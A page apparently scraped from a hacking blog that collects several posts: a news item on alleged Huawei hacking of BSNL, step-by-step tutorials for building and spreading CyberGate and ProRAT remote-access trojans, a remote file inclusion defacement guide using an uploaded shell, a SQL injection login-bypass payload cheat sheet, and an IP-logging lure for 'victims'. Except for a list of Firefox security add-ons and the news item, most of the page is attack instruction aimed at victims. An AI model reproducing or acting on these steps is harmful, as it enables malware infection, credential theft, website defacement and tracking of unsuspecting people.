Latest News

Showing posts with label Hack. Show all posts
Showing posts with label Hack. Show all posts

N3w dork list

There Is Some Of Dork which help to get information & secret INFO With Google ....

"Huawei" accused of Hacking Indian Telecom Company BSNL --News

A Senior Government official from India said that Investigation is going on over the allegation made by a media group that Chinese multinational networking and telecommunications equipment and services company Huawei allegedly hacked into state-run telecommunication Carrier BSNL.














    




Government have already launched an Investigation after a media report stated that Huawei hacked a BSNL Mobile base station controller.

"An incident about the alleged hacking of Bharat Sanchar Nigam Ltd (BSNL) network by M/S Huawei ... has come to notice," Killi Kruparani, junior minister for communications and information technology, said in a written reply to a question from a member of parliament.

we don't have any details of the allegation right now, said a senior spokesperson from Communications and information technology ministry said.


Huawei India denies any allegation of hacking BSNL, "we will work closely with customers and governments in India to address any network security issue that may arise in technical and business operations," Huawei Spokesperson said to reuters.


Chinese Companies including "Huawei" and "ZTE" have history of facing hacking allegations from different Countries.


In 2010 India blocked the import of Chinese telecom equipment's over suspicion that there may be some technologies embedded to spy over Government Official's communication. the ban was soon removed after Chinese makers agreed to new rules of proper checking of Equipment

Cybergate RAT Tutorial For Beginners

1) What is a R.A.T?
R.A.T is remote administration tool. In other words, if a RAT is set up correctly, then a person (hacker) would gain acces on victim's computer. That hacker can do any stuff in victim's pc.
For example: a)will be able to move his mouse and keyboards
b)will be able to see your victim by hacking his webcam and etc.

2) Which is the best RAT?
I dont use many RATs. The best that i ever used is Cybergate RAT

So now, lets get started.
First of all you guys download this:

Cybergate Download Link(click here to download)

this download link was not made by me.download and use it at your own risk
this application is called cybergate and it will used to create rat server.
this app might be detected as virus by some antivirus.but dont worry it is not backdoored.

download it and extract it to a folder.

==============================================================
Secondly set up the no-ip client

to do that you must go to :
NO-IP SITE(click here)

register there.

once you have logged in, you must "add a host"

Image has been scaled down 36% (758x329). Click this bar to view original image (1174x509). Click image to open in new window.

[Image: 1.jpg]



Now type in your name at hostname.and choose any domain. you dont have to follow the same name like in the picture below.
[Image: 2.jpg]


now you can see that you have successfully created a host.
now download the no-ip duc client that is available at that site.

Image has been scaled down 16% (758x273). Click this bar to view original image (902x324). Click image to open in new window.
[Image: 3.jpg]


click the windows version.

once done downloading, run the program. sign in using your no-ip username and password.
and press select host and you can see your host there. click at the box and press save .


===========================================================
now its time to set up your cybergate RAT seRVER
LETS CONTINUE

run the cybergate rat that you have extracted into a folder.
there will be agreement which you got to wait for a few seconds before agreeing.

next: Control center-->start


now a box would appear.you have type in 100 and press the go image button.
and type in the connection password as 123456
and click save

Image has been scaled down 26% (758x344). Click this bar to view original image (1012x458). Click image to open in new window.
[Image: 8.jpg]


now press: control center--->builder--->create server

Image has been scaled down 25% (758x345). Click this bar to view original image (1009x459). Click image to open in new window.
[Image: 9.jpg]



now a box would appear.
click new
press the name of the new user and ok

Image has been scaled down 25% (758x344). Click this bar to view original image (1009x457). Click image to open in new window.
[Image: 10.jpg]


now double click the new user.

Image has been scaled down 25% (758x342). Click this bar to view original image (1009x455). Click image to open in new window.
[Image: 11.jpg]

after that you will the connection tab.
view the picture for better understanding.

if you want to test the server on yourself or same lan networkk, then you have to edit the 127.0.0.1:999 to 127.0.0.1:100
if you want to test on others, then add:
yourhost.no-ip.info:100

Image has been scaled down 25% (758x346). Click this bar to view original image (1010x460). Click image to open in new window.
[Image: 12.jpg]

change the identification to cyber and password to 123456

Image has been scaled down 26% (758x344). Click this bar to view original image (1011x458). Click image to open in new window.
[Image: 13.jpg]


now press the installation tab and use the same setting as mine.
Install directory is the where the server installs
%System%
%Windows%
%Root%
%Program Files%
%Other%
it is more better to use "system"
Boot: this will be the startup option. check everything and press random 5 times so that the server will start everytime your victim start the computer
Directory is the place where the server will be situated
File Name will be the name of the server in the directory
change the creation date
persistence will inject the server into the victim,s pc until success
for inject into just use default browser
dont choose hide file because it will make your server detectable by all antivirus

Image has been scaled down 25% (758x345). Click this bar to view original image (1008x458). Click image to open in new window.
[Image: 14.jpg]


go to anti debug tab and check all

Image has been scaled down 25% (758x343). Click this bar to view original image (1010x456). Click image to open in new window.
[Image: 15.jpg]

and then go to create server tab
check use icon,delayed execution, and google chrome password
delayed execution will be the time taken for the server to inject into victim's pc .
google chrome password will help you to steal google chrome passwords.
a pop up will appear and just press ok

Image has been scaled down 25% (758x344). Click this bar to view original image (1008x457). Click image to open in new window.
[Image: 16.jpg]

now you have done setting up your server.
===================================================================
PortForwarding
Q: So, what is portforwarding?
A:Port forwarding allows remote computers, for example, computers on the Internet, to connect to a specific computer or service within a private local area network (LAN)
so lets start portforwarding.

remember that your the port that you have choosen is 100.
to make it easier.lets download the simpleportforward tool from this site:

SIMPLE PORT FORWARDING(click here)

from here pc wintech TuT starts ., all credits of port forwarding goes to Pc win tech.com
now, once it is downloaded,run the program.

1)firstly update your router list and set your router.

Image has been scaled down 38% (758x341). Click this bar to view original image (1216x547). Click image to open in new window.
[Image: 18.jpg]

and press the "choose which port you need to forward" by pressing the "do it now"
and press the "add custom"
type
name:anything
type: tcp/udp
start port:99
end port:100
and then press "add"

now click "update router"
[Image: 20.jpg]

when you have pressed update router, you can see the program accessing your router and editing whatever you have typed just now.
and now the last step, which is to check whether your port 100 is open or not.
but before that close your cybergate program.
and now do like in the below picture

Image has been scaled down 9% (758x551). Click this bar to view original image (829x602). Click image to open in new window.
[Image: 22.jpg]


if the portforwarding is failed, then you have to start from the beginning of portforwarding
======================================================================
now,you have done it.
what you have to do now is spread your server.
good luck

---------------------------------------------------------knox d3cryptor/Team 73cyf

Deface via RFI

#Searching for Vuln. Sites
#Checking if they are Vuln.
#Defacing them Tongue


++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Searching for Vuln. sites:

We can find Vuln.websites by using Google Dorks

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Checking if they are Vuln. :

Now after we searched for sites on Google, many sites will show but not all of them are Vuln.
so how can we check? Tongue

after opening the site check the link, for example it will be like:

http://www.tagert.com/index.php?page=ANYTHING

now to check the site we should replace "ANYTHING" with "http://www.google.com" Smile

so it will be like :

http://www.tagert.com/index.php?page=htt...google.com

IF Google home page showed up then the website is Vuln. for RFI,
IF not then fine another one Tongue




++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Defacing:


OK, now if we found a Vuln. website how to deface? o_O

well now open any website on any free host and upload your shell in .txt
and replace http://www.google.com to your shell link so for EXAMPLE it will be:
http://www.yourfreehost.com/shell.txt

http://www.tagert.com/index.php?page=htt...shell.txt?

[!]NOTE:- DO NOT FORGET THE '?' in the end of the URL Tongue Big Grin

Now your shell will show so Deface the site Tongue

Hackers AddOn [FireFox]

Fire Fox - A hackers Browser 


In this brief post, we are listing a few popular and interesting Firefox add-ons that are useful for penetration testers. These add-ons vary from information gathering tools to attacking tools. If you are using BACKTRACK than use OWASP Mantra which has lots of useful Add-ons.

(1)Firebug
Firebug is a nice add-on that integrates a web development tool inside the browser. With this tool, you can edit and debug HTML, CSS and JavaScript live in any webpage to see the effect of changes. It helps in analyzing JS files to find XSS vulnerabilities. It’s an really helpful add-on in finding DOM based XSS for security testing professionals.Add Firebug in your Browser from this link:https://addons.mozilla.org/en-US/firefox/addon/firebug/

(2)Web Developer
Web Developer is another nice add-on that adds various web development tools in the browser. It helps in web application penetration testing.Add Web Developer in your browser from this link: https://addons.mozilla.org/de/firefox/addon/web-developer/

(3)Live HTTP Headers
Live HTTP Headers is a really helpful penetration testing add-on for Firefox. It displays live headers of each http request and response. You can also save header information by clicking on the button in the lower left corner. I don’t think that there is any kind of need to tell how important this add-on is for the security testing process.Add 
Live HTTP Headers to Firefox with this link: https://addons.mozilla.org/en-US/firefox/addon/live-http-headers/

(4)Tamper Data
Tamper Data is similar to the Live HTTP Header add-on but, has header editing capabilities. With the tamper data add-on, you can view and modify HTTP/HTTPS headers and post parameters. Thus it helps in security testing web application by modifying POST parameters. It can be used in performing XSS and SQL Injection attacks by modifying header data.Add the 
Tamper data add-on to Firefox browser with this link: https://addons.mozilla.org/en-US/firefox/addon/tamper-data/)


(5)Hackbar
Hackbar is a simple penetration tool for Firefox. It helps in testing simple SQL injection and XSS holes. You cannot execute standard exploits but you can easily use it to test whether vulnerability exists or not. You can also manually submit form data with GET or POST requests. It also has encryption and encoding tools. Most of the times, this tool helps in testing XSS vulnerability with encoded XSS payloads. It also supports keyboard shortcuts to perform various tasks.I am sure, most of the persons in the security field already know about this tool. This tool is mostly used in finding POST XSS vulnerabilities because it can send POST data manually to any page you like. With the ability of manually sending POST form data, you can easily bypass client side validations of the page. If your payload is being encoded at client side, you can use an encoding tool to encode your payload and then perform the attack. If the application is vulnerable to the XSS, I am sure you will find the vulnerability with the help of the Hackbar add-on on Firefox browser.Add 
Hackbar add-on to Firefox browser with this link: https://addons.mozilla.org/en-US/firefox/addon/hackbar/ 


(6)Websecurify
Websecurify is a nice penetration testing tool that is also available as add-on for Firefox. We have already covered WebSecurify in detail in previous article. WebSecurify can detect most common vulnerabilities in web applications. This tool can easily detect XSS, SQL injection and other web application vulnerability. Unlike other listed tools, it is a complete penetration testing tool in itself available as a browser add-on. It gives most of the features available in standalone tool.AddWebSecurify to Firefox browser with this link: https://addons.mozilla.org/en-us/firefox/addon/websecurify/

(7)XSS Me
Cross Site Scripting is the most found web application vulnerability. For detecting XSS vulnerabilities in web applications, this add-on can be a useful tool. XSS-Me is used to find reflected XSS vulnerabilities from a browser. It scans all forms of the page, and then performs an attack on the selected pages with pre-defined XSS payloads. After the scan is complete, it lists all the pages that renders a payload on the page, and may be vulnerable to XSS attack. Now, you can manually test the web page to find whether the vulnerability exists or not.Add XSS Me
to your Firefox browser: https://addons.mozilla.org/en-us/firefox/addon/xss-me/

(8)SQL Inject Me
SQL Inject Me is another nice Firefox add-on used to find SQL injection vulnerabilities in web applications. This tool does not exploit the vulnerability but display that it exists. SQL injection is one of the most harmful web application vulnerabilities, it can allow attackers to view, modify, edit, add or delete records in a database.The tool sends escape strings through form fields, and tries to search database error messages. If it finds a database error message, it marks the page as vulnerable. QA testers can use this tool for SQL injection testing.Add SQL Inject Me
add-on to your browser: https://addons.mozilla.org/en-us/firefox/addon/sql-inject-me/

(9)CryptoFoxCryptoFox is an encryption or decryption tool for Mozilla Firefox. It supports most of the available encryption algorithm. So, you can easily encrypt or decrypt data with supported encryption algorithm. This add-on comes with dictionary attack support, to crack MD5 cracking passwords. Although, it hasn’t have good reviews, it works satisfactorily.Add CryptoFox add-on to your browser:https://addons.mozilla.org/en-US/firefox/addon/cryptofox/

cheat sheet for admin page bypass [sql injection]

strings ::

' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
= 'or' 1=1
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'
==
and 1=1--
and 1=1
' or 'one'='one--
' or 'one'='one
' and 'one'='one
' and 'one'='one--
1') and '1'='1--
admin' --
admin' #
admin'/*
or 1=1--
or 1=1#
or 1=1/*
) or '1'='1--
) or ('1'='1--
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055

How to hack an IP addess of a remote computer


What can you do with an IP address?
Well you can hack a computer using it's IP address.
You can find the location of the computer using its IP address.

Things required:
1)  PHP script to catch the IP.
2) .txt file to store the IP.
you can download them from here.

Procedure:
Step 1: First create an account in any free webhosting site.
          examples are www.110mb.com
                              www.drivehq.com
                              www.t35.com
                              www.my3gb.com
Step 2: Extract the IP finder script you have downloaded.
Step 3: Now Upload the files onto the free web hosting site.
Step 4:Give the link of ip.php script to your friend.

When he clicks the link, his IP address will be strored in the ip_log.txt file.

DEMONSTRATION:

Here i have uploaded my scripts on to www.my3gb.com


and i clicked the ip.php link.
Now my IP address is stored in the ip_log.txt file

You can check out this with www.showmyip.com
Finding the location of the computer:
Now pick the IP address you got from the victim and open www.ip2location.com
here enter the IP address in the box and click "find location".
Thats it..

ProRAT [Trojan ] [TuT]



Hi guys..today i am going to show you how to set up ProRat and how to hack a computer using it. Well, i am going to finish up RAT setup articles with this. I will give the counter measures in my next article. As i haven’t written any articles on direct connection Trojans, I decided to write the one on PRORAT.

procedure to setup ProRat

STEP 1. First of all Download ProRat from here. Once it is downloaded extract it. A password prompt will come up. Enter the password.The password  "pro".

STEP 2. Open up the program and You should see the following window.



STEP 3. Click on the "Create" button in the bottom. Choose "Create ProRat Server".


STEP 4. Next put your IP address so the server could connect to you. You need not enter your IP address manually, you can do this by just clicking on the little arrow. it automatically fills your IP address.
Next put in your e-mail so that when and if a victim gets infected it will send you an email.


STEP 5. Now Open General settings. This tab is the most important tab. In the check boxes, we will choose the server port the program will connect through, the password you will be asked to enter when the victim is infected and you wish to connect with them, and the victim name. As you can see ProRat has the ability to disable the windows firewall and hide itself from being displayed in the task manager. Just follow the steps as shown in the figure.


STEP  6. Click on the Bind with File button to continue. Here you will have the option to bind the trojan server file with another file. You can select an image, text file or pdf file, So as to make the victim trust your file.


STEP  7. Click on the Server Extensions button to continue. Here you choose what kind of server file to generate.    I prefer using .exe files.


STEP  8. Click on Server Icon to continue. Here you will choose an icon for your server file to have. The icons help mask what the file actually is.


STEP  9. After this, press Create server, your server will be in the same folder as ProRat. Start giving this file to your victim. When the victim double click the file, his computer will be in your control.


STEP  10. Now the hacker has lot of options to choose from. He can do many funny things with the victim’s computer.



NOTE: In this tutorial, i put the victim’s IP as 127.0.0.1 as i am testing it on my computer. Inorder to hack a remote computer, you need to get the IP address of your victim. If you dont  know how to find an IP address, you can read my article on finding out remote IP address from here

Contact Us

24x7 online , we happy to answer you
tamilcypc@gmail.com

Disclaimer

This Blog and its TUT's are intended for educational purposes only, no-one involved in the creation of this TuT may be held responsible for any illegal acts brought about by this Blog or TuT.



Featured Post

Custom Domains And HTTPS Redirection Code